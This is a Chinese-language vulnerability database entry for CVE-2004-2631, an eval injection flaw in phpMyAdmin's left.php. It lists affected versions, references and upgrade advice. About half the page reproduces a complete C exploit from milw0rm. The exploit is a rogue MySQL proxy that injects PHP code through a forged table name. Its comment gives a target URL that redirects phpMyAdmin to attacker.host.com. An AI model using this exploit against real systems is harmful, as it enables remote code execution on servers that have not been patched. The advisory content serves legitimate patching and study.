CVE-2004-2631
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 23:07:12
NMCOE    

[原文]Eval injection vulnerability in left.php in phpMyAdmin 2.5.1 up to 2.5.7, when LeftFrameLight is FALSE, allows remote attackers to execute arbitrary PHP code via a crafted table name.


[CNNVD]phpMyAdmin多个输入验证漏洞(CNNVD-200412-333)

        phpMyAdmin 2.5.1至2.5.7版本的left.php在LeftFrameLight错误时存在Eval注入漏洞。远程攻击者可以借助畸形表名执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:phpmyadmin:phpmyadmin:2.5.5_pl1
cpe:/a:phpmyadmin:phpmyadmin:2.5.2_pl1
cpe:/a:phpmyadmin:phpmyadmin:2.5.2
cpe:/a:phpmyadmin:phpmyadmin:2.5.1
cpe:/a:phpmyadmin:phpmyadmin:2.5.4
cpe:/a:phpmyadmin:phpmyadmin:2.5.6_rc2
cpe:/a:phpmyadmin:phpmyadmin:2.5.3
cpe:/a:phpmyadmin:phpmyadmin:2.5.6_rc1
cpe:/a:phpmyadmin:phpmyadmin:2.5.5
cpe:/a:phpmyadmin:phpmyadmin:2.5.5_rc2
cpe:/a:phpmyadmin:phpmyadmin:2.5.5_rc1
cpe:/a:phpmyadmin:phpmyadmin:2.5.7

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2631
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2631
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-333
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2004-06/0444.html
(UNKNOWN)  BUGTRAQ  20040628 php codes injection in phpMyAdmin version 2.5.7.
http://archives.neohapsis.com/archives/bugtraq/2004-06/0473.html
(UNKNOWN)  BUGTRAQ  20040630 Re: php codes injection in phpMyAdmin version 2.5.7.
http://eagle.kecapi.com/sec/fd/phpMyAdmin.html
(UNKNOWN)  MISC  http://eagle.kecapi.com/sec/fd/phpMyAdmin.html
http://marc.info/?l=bugtraq&m=109816584519779&w=2
(UNKNOWN)  BUGTRAQ  20041018 phpMyAdmin: Vulnerability in MIME-based transformation
http://securitytracker.com/id?1010614
(UNKNOWN)  SECTRACK  1010614
http://www.gentoo.org/security/en/glsa/glsa-200407-22.xml
(UNKNOWN)  GENTOO  GLSA-200407-22
http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2004-1
(PATCH)  CONFIRM  http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2004-1
http://www.securiteam.com/unixfocus/5QP040ADFW.html
(UNKNOWN)  MISC  http://www.securiteam.com/unixfocus/5QP040ADFW.html
http://www.securityfocus.com/bid/10629
(PATCH)  BID  10629
http://xforce.iss.net/xforce/xfdb/16542
(PATCH)  XF  phpmyadmin-php-injection(16542)

- 漏洞信息

phpMyAdmin多个输入验证漏洞
高危 输入验证
2004-12-31 00:00:00 2005-12-21 00:00:00
远程  
        phpMyAdmin 2.5.1至2.5.7版本的left.php在LeftFrameLight错误时存在Eval注入漏洞。远程攻击者可以借助畸形表名执行任意PHP代码。

- 公告与补丁

        The vendor has released version 2.5.7, patch level 1 addressing this vulnerability. Users of affected packages are urged to upgrade.
        Gentoo has released an advisory (GLSA 200407-22) and an updated eBuild to address the issues that are described in this BID. Gentoo users are advised to perform the following actions as a superuser in order to apply appropriate fixes.
        emerge sync
        emerge -pv ">=dev-db/phpmyadmin-2.5.7_p1"
        emerge ">=dev-db/phpmyadmin-2.5.7_p1"
        phpMyAdmin phpMyAdmin 2.5.1
        
        phpMyAdmin phpMyAdmin 2.5.2
        
        phpMyAdmin phpMyAdmin 2.5.4
        
        phpMyAdmin phpMyAdmin 2.5.5 -rc2
        
        phpMyAdmin phpMyAdmin 2.5.5 pl1
        
        phpMyAdmin phpMyAdmin 2.5.5
        
        phpMyAdmin phpMyAdmin 2.5.5 -rc1
        
        phpMyAdmin phpMyAdmin 2.5.6 -rc1
        
        phpMyAdmin phpMyAdmin 2.5.7
        

- 漏洞信息 (309)

phpMyAdmin 2.5.7 Remote code injection Exploit (EDBID:309)
php webapps
2004-07-04 Verified
0 Nasir Simbolon
N/A [点击下载]
/*    
 * phpmy-explt.c  
 * written by Nasir Simbolon <nasir kecapi com>
 * eagle kecapi com
 * Jakarta, Indonesia
 * 
 * June, 10 2004 
 * 
 * A phpMyAdmin-2.5.7 exploite program.
 * This is a kind of   mysql server wrapper  acts like a proxy except that it will sends a fake table name,
 * when client query "SHOW TABLES",  by replacing the real table name with a string contains exploite codes.
 *
 * Compile : gcc phpmy-explt.c -o phpmy-explt
 *
 * run with
 * ./phpmy-explt
 *
 * and go to your target and put 
 *
 * http://target/phpMyAdmin-2.5.7/left.php?server=4&cfg[Servers][4][host]=
 * attacker.host.com&cfg[Servers][4][port]=8889&cfg[Servers][4][auth_type]=config&cfg[Servers]
 * [4][user]=user&cfg[Servers][4][password]=pass&cfg[Servers][4][connect_type]=tcp&&cfg[Servers]
 * [4][only_db]=databasename
 *
 * fill host,port,user,pass and databasename correctly
 *
 */


#include<stdio.h>
#include<sys/socket.h>
#include<netdb.h>

#define BIND_PORT 8889
#define MYSQL_PORT 3306
#define HOSTNAME "localhost"
#define DATABASE "phpmy"


#define BUFFER_LEN 1024

/* This is php code we want to inject into phpMyAdmin 
   Do NOT use  single quote (') in the string, use double quote (") instead
*/
char *phpcodes = "exec(\"touch /tmp/your-phpmyadmin-is-vulnerable\");";


  /* This is examples codes I captured when mysql server
     reply to client's request of query "SHOW TABLES" query.
     It shows  database  name 'phpmy' and contain one tablename  'mytable'
     Our aim is to manipulate the data received from mysql server
     by replacing 'mytable' with our exploide codes.
     
     0x1 ,0x0 ,0x0 ,0x1 ,0x1 ,0x1b,0x0 ,0x0 ,0x2 ,0x0 ,
     0xf ,'T' ,'a' ,'b' ,'l' ,'e' ,'s' ,'_' ,'i' ,'n' ,
     '_' ,'p' ,'h' ,'p' ,'m' ,'y' ,0x3 ,0x40,0x0 ,0x0 ,
     0x1 ,-2  ,0x3 ,0x1 ,0x0 ,0x1f,0x1 ,0x0 ,0x0 ,0x3 ,
     -2  ,8  ,0x0 ,0x0 ,0x4 ,7   ,'m' ,'y' ,'t' ,'a' ,
     'b' ,'l' ,'e' ,0x1 ,0   ,0   ,0x5 ,-2
  */


int build_exploite_code(char* dbname,char* phpcodes,char** expcode)
{	
   char my1[21] = {0x1 ,0x0 ,0x0 ,0x1 ,0x1 ,0x1b,0x0 ,0x0 ,0x2 ,0x0 ,
     	 	   0xf ,'T' ,'a' ,'b' ,'l' ,'e' ,'s' ,'_' ,'i' ,'n' ,
     		   '_'}; 
   /* part of dbname     ('p' ,'h' ,'p' ,'m' ,'y') */
   char my2[15] = {0x3 ,0x40,0x0 ,0x0 ,0x1 ,-2  ,0x3 ,0x1 ,0x0 ,0x1f,
	           0x1 ,0x0 ,0x0 ,0x3 ,-2};  
   /* part of int phpcodes string length +1   (8) */ 
   char my3[3]  = {0x0 ,0x0 ,0x4};
   /* part of int phpcodes string length      (7) */ 
   /* part of tablename    ('m' ,'y' ,'t' ,'a' ,'b' ,'l' ,'e' ) */
   char my4[5]  = {0x1 ,0   ,0   ,0x5 ,-2};
	
   int len,i;

   len = 21 + strlen(dbname) + 15 + 1 + 3 + 1 +  strlen(phpcodes) + 5 + 5;
   *expcode = (char*) malloc(sizeof(char) * len); 
   
   i = 0;
   bcopy(&my1[0],*expcode + i,21);
   i += 21;
   bcopy(dbname, *expcode + i,strlen(dbname));
   i += strlen(dbname);
   bcopy(&my2[0],*expcode + i,15);
   i += 15;
   (*expcode)[i] = 5 + strlen(phpcodes) + 1;
   i ++;
   bcopy(&my3[0],*expcode + i,3);
   i += 3;  
   (*expcode)[i++] = 5 + strlen(phpcodes) ;
   /* this is our exploite codes*/
   (*expcode)[i++] = '\\'; 
   (*expcode)[i++] = '\''; 
   (*expcode)[i++] = ';'; 
   bcopy(phpcodes,*expcode + i,strlen(phpcodes));
   i += strlen(phpcodes);
   (*expcode)[i++] = '/'; 
   (*expcode)[i++] = '*'; 
   bcopy(&my4[0],*expcode + i,5);
   
   return len;
}

/* connect to mysql server*/

int connect_mysql()
{
    int s2;
    struct sockaddr_in ina;
    struct hostent *h;
    
    h = gethostbyname(HOSTNAME);
    /* set internet address */
    bcopy(h->h_addr,(void *)&ina.sin_addr,h->h_length);
    ina.sin_family = AF_INET;
    ina.sin_port = htons(MYSQL_PORT);
    //ina.sin_zero[0]='\0';
    if((s2=socket(AF_INET,SOCK_STREAM,0)) < 0) 
  	perror("Socket: ");
    
    if(connect(s2,(struct sockaddr *)&ina,sizeof(ina)) < 0 )
	                   perror("connect()");
    return s2;
}

/* listener */
int listener()
{
    int s1;
    int opt;
    struct sockaddr_in ina;

    /* set internet address */
    ina.sin_family = AF_INET;
    ina.sin_port = htons(BIND_PORT);
    ina.sin_addr.s_addr = INADDR_ANY;

    if((s1=socket(AF_INET,SOCK_STREAM,0)) < 0) 
  	perror("Socket: ");
    
    opt = 1;
    setsockopt(s1,SOL_SOCKET, SO_REUSEADDR , (char *)&opt, sizeof(opt) );
       
    if(bind(s1,(struct sockaddr *)&ina,sizeof(ina))==-1) 
	perror("Bind: ");
	
    if(listen(s1, 10) == -1) 
  	perror("Listen"); 
	
   return s1;
}


int main(int argc,char* argv[])
{
	struct sockaddr_in ina1;
	int ina1_l;
	int s_daemon,s_mysql;
	size_t byte_read,byte_written;
	char *buf;
	int sc,event,n_select;
	fd_set rfds;
        struct timeval tv;	 
	int exptlen,i;
	char *expt;
	char *dbname=DATABASE;
	
	buf = (char*) malloc(sizeof(char) * (BUFFER_LEN));
	tv.tv_sec  = 15;
	tv.tv_usec = 0;
	
	/* we listen to port */
	 s_daemon = listener();
    
	exptlen = build_exploite_code(dbname,phpcodes,&expt);

	for(;;) 
	{
	   fprintf(stderr,"waiting for connection\n");
	   
	   if( -1 == (sc = accept(s_daemon,(struct sockaddr *) &ina1,&ina1_l)) ) 
		  perror("accept()");
	   /* if we get here, we have a new connection */
	   fprintf(stderr,"got client connection\n");
mysql:
	   /* connect to mysql */
	   s_mysql = connect_mysql();
        
	   for(;;) 
	    {
	   	FD_ZERO(&rfds);
	        FD_SET(sc,&rfds);
  	   	FD_SET(s_mysql,&rfds);                                
		
	        n_select = (sc > s_mysql)? sc : s_mysql;

	    	event = select(n_select+1,&rfds,NULL,NULL,NULL);
	    	if(-1  == event) 
		    perror("select()");
	        else 
		{	
		    if(FD_ISSET(s_mysql,&rfds)) 
		     {
			byte_read = read(s_mysql,buf,BUFFER_LEN);
		    	/* check for closing client connection*/
		    	if(byte_read == 0) 
	  	        {
			   shutdown(s_mysql,SHUT_RDWR);
			   close(s_mysql);
			   goto mysql;
		        }

			 /* check data received from mysql server.
			  * if  buf[11] contain 'T', data received from   mysq server is table list
			  *
			  * NOW we replace the table with our exploite codes and send them to client
			  */
		        if( 'T' == buf[11])
			{
		           for(i=0;i<exptlen;i++) 
		              buf[i] = expt[i];
		           byte_read = exptlen;
		        }
		       
		        if(write(sc, buf, byte_read) < 0)
		           break; 
		     }
	           
	             if(FD_ISSET(sc,&rfds)) 
		     {	
	   	         byte_read = read(sc,buf,BUFFER_LEN);
		         /* check for closing client connection*/
		         if(byte_read == 0) 
		         {	
			    close(sc);    
			    break;
		         }

		       if(write(s_mysql,buf,byte_read) < 0) 
			       break; 	    
		     }    
#if defined(DEBUG)		     
		     fprintf(stderr,"data:\n");	
		     for(i=0;i<byte_read;i++) 
			     fprintf(stderr," %c(%x) ",buf[i],buf[i]);
#endif    
	        }   

	    } 
	}
	free(buf);
	free(expt);
	return 0;
}

// milw0rm.com [2004-07-04]
		

- 漏洞信息

7314
phpMyAdmin left.php Code Injection
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

phpMyAdmin contains a flaw that will allow a remote attacker to inject arbitrary PHP code. If $cfg['LeftFrameLight'] in the 'config.lib.php' script is set to false, a remote attacker could supply a specially-crafted HTTP request containing malicious PHP code in the eval function of the 'left.php' script resulting in a loss of integrity.

- 时间线

2004-06-28 Unknow
2004-06-28 Unknow

- 解决方案

Upgrade to version 2.5.7 Patch Level 1, 2.6.0-rc1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站